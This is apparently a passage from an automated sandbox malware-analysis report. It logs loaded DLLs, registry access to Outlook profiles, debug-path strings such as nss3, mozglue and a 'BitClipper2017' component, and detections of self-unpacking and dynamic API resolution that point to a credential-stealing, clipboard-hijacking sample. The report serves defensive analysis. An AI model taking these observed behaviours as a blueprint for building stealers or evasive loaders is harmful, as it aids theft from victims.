Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: msctfui.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: kO1P1YnLst.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: kO1P1YnLst.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: kO1P1YnLst.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: kO1P1YnLst.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: kO1P1YnLst.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: kO1P1YnLst.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: kO1P1YnLst.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: u5c4.0.exe, 00000001.00000002.2520130811.000000006CCAD000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036160514.00000240F7980000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1883500412.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888596388.00000000049F8000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888307607.0000000004640000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138665040.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2139000539.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140183623.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139995282.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140368721.0000000003FF7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2370662584.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2367955603.0000000005409000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: mozglue.pdb source: u5c4.0.exe, 00000001.00000002.2520130811.000000006CCAD000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000002.1882327714.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1797546896.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2066260274.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2136653870.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071517610.00000240FE690000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027627849.00000240F7070000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1889183698.000000006C8B7000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000D.00000002.2140800122.000000006CE97000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3035836028.00000240F7970000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027735940.00000240F7080000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: kO1P1YnLst.exe
Source: Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: IIDHJDGCGD.exe, 00000017.00000002.2969185171.0000000000EAC000.00000002.00000001.01000000.0000001D.sdmp, IIDHJDGCGD.exe, 00000017.00000000.2476318454.0000000000EAC000.00000002.00000001.01000000.0000001D.sdmp, tiktok[1].exe.1.dr
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3035558933.00000240F7960000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027735940.00000240F7080000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3035558933.00000240F7960000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1883500412.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888596388.00000000049F8000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888307607.0000000004640000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138665040.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2139000539.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140183623.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139995282.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140368721.0000000003FF7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2370662584.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2367955603.0000000005409000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071636257.00000240FE6A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3013066621.000002409001C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ;C:\timisa37 vugut_daxub.pdb source: kO1P1YnLst.exe, 00000000.00000003.1743343365.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000000.1740698273.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\timisa37 vugut_daxub.pdb source: kO1P1YnLst.exe, 00000000.00000003.1743343365.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000000.1740698273.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: kO1P1YnLst.exe
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: nss3.pdb source: u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source: kO1P1YnLst.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: kO1P1YnLst.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: kO1P1YnLst.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: kO1P1YnLst.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: kO1P1YnLst.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Unpacked PE file: 1.2.u5c4.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Unpacked PE file: 0.2.kO1P1YnLst.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Unpacked PE file: 1.2.u5c4.0.exe.400000.0.unpack
Contains functionality to dynamically determine API calls
